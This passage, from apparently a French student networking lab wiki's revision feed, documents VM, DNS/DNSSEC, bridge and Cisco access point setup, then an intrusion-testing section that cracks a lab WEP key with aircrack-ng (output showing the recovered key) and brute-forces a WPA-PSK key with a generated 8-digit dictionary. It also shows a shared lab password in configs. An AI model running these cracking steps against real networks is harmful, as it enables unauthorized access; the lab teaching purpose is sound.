- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/toad59.site.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/toad59.site.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''named.conf.local''' pour utiliser '''db.toad59.site.signed'''&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;etc/bind/db.toad59.site.signed&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56427</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56427"/>
				<updated>2021-11-19T12:46:53Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''named.conf.local''' pour utiliser '''db.toad59.site.signed'''&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;etc/bind/db.toad59.site.signed&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
